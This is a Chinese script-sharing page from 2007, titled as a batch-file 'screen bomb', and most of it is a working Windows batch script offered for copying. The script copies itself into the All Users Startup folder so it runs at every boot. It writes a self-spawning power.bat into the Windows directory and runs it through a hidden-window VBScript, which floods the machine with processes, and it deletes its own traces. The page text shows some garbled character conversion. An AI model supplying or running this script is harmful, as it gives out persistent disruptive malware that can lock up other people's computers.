批處理實(shí)現(xiàn)屏幕炸彈
更新時(shí)間:2007年08月09日 10:42:06 作者:
復(fù)制代碼 代碼如下:
@echo off
if not exist "%HOMEPATH%\..\All Users\「開始」菜單\程序\啟動(dòng)\power.bat" copy %~fs0 "%HOMEPATH%\..\All Users\「開始」菜單\程序\啟動(dòng)\power.bat">nul
echo @echo off>%windir%\power.bat
echo if "%%1"=="" goto :end>>%windir%\power.bat
echo if exist C:\_stop goto :EOF>>%windir%\power.bat
echo start /B %%~fs0 exp>>%windir%\power.bat
echo :s>>%windir%\power.bat
echo if not exist C:\_stop goto s>>%windir%\power.bat
echo exit>>%windir%\power.bat
echo :end>>%windir%\power.bat
echo del %%~fs0>>%windir%\power.bat
echo set ws=CreateObject("WScript.Shell")>%windir%\power.vbs
echo ws.Run "%windir%\power.bat exp",0 >>%windir%\power.vbs
WScript %windir%\power.vbs
del %windir%\power.vbs
set p=%~ps0
if not %p:~-3,2%==啟動(dòng) del %~fs0
相關(guān)文章
用批處理實(shí)現(xiàn)映射盤網(wǎng)絡(luò)盤為固定盤符,請更改沖突的硬盤盤符
用批處理實(shí)現(xiàn)映射盤網(wǎng)絡(luò)盤為固定盤符,請更改沖突的硬盤盤符...2007-03-03一鍵重置mysql的root密碼的實(shí)現(xiàn)腳本
這篇文章主要介紹了一鍵重置mysql的root密碼的實(shí)現(xiàn)腳本,比較實(shí)用,需要的朋友可以參考下2014-09-09實(shí)現(xiàn)百度關(guān)鍵字搜索的批處理
實(shí)現(xiàn)百度關(guān)鍵字搜索的批處理...2007-08-08